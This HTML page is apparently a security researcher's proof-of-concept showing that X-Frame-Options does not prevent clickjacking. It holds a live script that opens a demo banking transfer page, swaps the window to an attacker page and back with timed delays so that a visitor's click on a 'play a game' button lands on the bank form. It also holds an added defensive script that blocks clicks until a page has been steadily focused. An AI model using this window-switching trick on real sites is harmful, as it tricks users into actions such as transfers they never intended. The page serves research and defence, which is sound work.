<h3><i>X-Frame-Options</i> is worth less than you think</h3>

<script>
var w;

// Precache the pages and images the demo navigates to, so that the later
// location changes complete fast enough for the timing below.
var x = new Image();
x.src = 'http://banking.beaver-peak.us/banking_interface/transfers/';

var x2 = new Image();
x2.src = 'http://banking.beaver-peak.us/banking_interface/transfers/beaver-peak.jpg';

var x3 = new Image();
x3.src = 'http://lcamtuf.coredump.cx/clickit/win.html';

var x4 = new Image();
x4.src = 'http://lcamtuf.coredump.cx/clickit/win.jpg';

// Step 1: open the target site in a new window, then hand over to complete().
function prepare() {
  w = open('http://banking.beaver-peak.us/banking_interface/transfers/', '_blank');
  setTimeout(complete, 300);
}

// Step 2: navigate that window to the demo page and start polling it.
function complete() {
  w.location.href = 'http://lcamtuf.coredump.cx/clickit/attacker.html';
  setTimeout(goback, 1000);
}

// Step 3: while the same-origin demo page is loaded its document is readable;
// once the window has gone back to the cross-origin site the access throws,
// and after a short delay the window is sent on to the final page.
function goback() {
  try {
    if (w.document.body.innerHTML == undefined) throw 1;
    setTimeout(goback, 100);
  } catch (e) {
    // That one case where prompts.tab_modal.enabled=true would have helped in Firefox...
    var delay = (navigator.userAgent.indexOf('Firefox/') != -1) ? 1500 : 500;
    setTimeout(function () {
      w.location.href = 'http://lcamtuf.coredump.cx/clickit/win.html';
    }, delay);
  }
}
</script>
<p>
JavaScript allows you to exploit human cognitive abilities to a remarkable extent; tools such as
window positioning, <code>history.forward()</code> and <code>history.back()</code>, open some
scary possibilities that we are <a href="http://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.html">completely unprepared to deal with</a>.
This proof-of-concept aims to demonstrate this; while it is intentionally crude and makes no real effort to
conceal its operation, the transitions <a href="http://lcamtuf.coredump.cx/switch/">can be made seamless</a> and very
difficult to perceive. Very accurate click prediction can be achieved by carefully measuring
mouse velocity and distance to destination, too.
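<p>
The whole trick above depends on the victim's click landing within a few hundred milliseconds of a window navigation. As an added defensive example (not part of this page or its proof-of-concept), the script below refuses clicks on a sensitive form until the page has been steadily visible and focused for a settle time; the form id <code>transfer-form</code> and the 1000 ms threshold are assumptions.

```javascript
// Added example, not lcamtuf's code: a "settle-time" click gate for a
// sensitive form. The attack counts on a click arriving right after the
// window was navigated, so the page refuses clicks until it has been
// visible AND focused for at least SETTLE_MS. SETTLE_MS is an assumed value.
var SETTLE_MS = 1000;

// Pure timing logic, kept free of DOM calls so it can be tested outside a
// browser. Timestamps are milliseconds, e.g. from performance.now().
function createClickGate(settleMs) {
  if (settleMs === undefined) settleMs = SETTLE_MS;
  var steadySince = null; // when the page last became visible and focused

  return {
    // Feed this on load, focus, blur and visibilitychange events.
    update: function (isVisible, hasFocus, now) {
      if (isVisible && hasFocus) {
        if (steadySince === null) steadySince = now;
      } else {
        steadySince = null; // any interruption restarts the clock
      }
    },
    // True only if the page has been steady for at least settleMs.
    allows: function (now) {
      return steadySince !== null && now - steadySince >= settleMs;
    }
  };
}

// Browser wiring: keep the submit button disabled while the gate is closed,
// and re-check at submit time because a switch may have just happened.
function protectForm(form, gate) {
  var button = form.querySelector('[type=submit]');
  if (!button) return;
  function refresh() {
    var now = performance.now();
    gate.update(document.visibilityState === 'visible', document.hasFocus(), now);
    button.disabled = !gate.allows(now);
  }
  window.addEventListener('focus', refresh);
  window.addEventListener('blur', refresh);
  document.addEventListener('visibilitychange', refresh);
  form.addEventListener('submit', function (e) {
    refresh();
    if (!gate.allows(performance.now())) e.preventDefault(); // too soon after a switch
  });
  refresh();
  setInterval(refresh, 100); // re-enable the button once the settle time has passed
}

// Only touch the DOM when one exists (assumed form id: "transfer-form").
if (typeof document !== 'undefined' && document.getElementById('transfer-form')) {
  protectForm(document.getElementById('transfer-form'), createClickGate());
}
```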

<p>
I discuss these attacks and many other unsolved challenges in web app design in
<i><a href="http://lcamtuf.coredump.cx/tangled/">"The Tangled Web"</a></i>.
A similar approach poses a problem with many browser UIs; for that, 
<a href="http://lcamtuf.blogspot.com/2010/08/on-designing-uis-for-non-robots.html">check out this post</a>.
<p>
<input type=submit value="Click here to play a game" onclick="prepare()">